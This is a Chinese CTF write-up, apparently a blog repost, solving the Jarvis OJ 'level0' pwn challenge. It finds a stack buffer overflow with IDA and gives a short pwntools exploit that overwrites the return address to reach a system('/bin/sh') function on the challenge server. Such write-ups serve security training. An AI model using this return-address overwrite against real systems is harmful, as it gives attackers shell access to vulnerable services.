其他分享
首页 > 其他分享> > Jarvis OJ level0 writeup

Jarvis OJ level0 writeup

作者:互联网

Jarvis OJ level0 writeup(萌新一枚,不足之处还请大佬指点)

拿到这个题目,首先查看一下保护:
在这里插入图片描述
可以看到NX打开,堆栈不可执行(在这题中也没什么用)
打开IDA查看一下:
在这里插入图片描述
点击右边的main会进入反汇编代码,通过反汇编可以看到main函数调用了一个vul()函数,我们双击函数跳转:

在这里插入图片描述
由汇编代码可以看出buf缓存区离rbp(前栈帧)有0x80h的距离,也就是说距离返回地址有0x88h的距离。
(因为这是64位的程序所以rbp是8个字节,故加8达到rip)
找到溢出点后,我们找找什么能用的代码段,由于这题比较简单,题目直接给出了system("/bin/sh"),我们就直接用就可以了。
在这里插入图片描述
双击callsystem查看他的地址,下面是exp:

#! usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com',9881)
payload='a'*0x88+p64(0x0400596)
p.recvuntil("Hello, World\n")
p.sendline(payload)
p.interactive()

然后我们就获得flag了。
在这里插入图片描述

标签:bin,OJ,writeup,双击,level0,反汇编,main,Jarvis
来源: https://blog.csdn.net/qq_43986365/article/details/94879075